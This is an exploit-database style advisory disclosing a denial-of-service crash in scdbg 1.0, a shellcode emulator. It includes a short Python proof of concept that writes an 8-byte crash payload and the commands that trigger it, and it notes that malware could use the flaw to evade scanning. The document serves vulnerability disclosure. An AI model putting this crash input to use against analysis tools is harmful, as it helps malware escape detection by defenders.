# Exploit Title: Scdbg 1.0 - Buffer overflow DoS
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-06-13
# Vendor Homepage:  http://sandsprite.com/blogs/index.php?uid=7&pid=152
# Software Link : https://github.com/dzzie/VS_LIBEMU
# Tested Version: 1.0 - Compile date: Jun  3 2021 20:57:45
# Tested on:  Windows 7, 10

CVSS v3: 7.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE: CWE-400

Vulnerability description: scdbg.exe (all versions) is affected by a Denial
of Service vulnerability that occurs when you use the /foff parameter or
not with a specific shellcode causing it to shutdown. Any malware could use
this option to evade the scan.

Proof of concept:

Save this script like scdbg_crash.py and execute it: scdbg.exe -foff 1 -f
scdbg_crash.bin / scdbg.exe -f scdbg_crash.bin

#!/usr/bin/env python

crash = "\x90\xF6\x84\x01\x90\x90\x90\x90"
f = open ("scdbg_crash.bin", "w")
f.write(crash)
f.close()

You can use gui_launcher.exe and check "Start offset 0x": 1 or directly
without check

[image: image.png]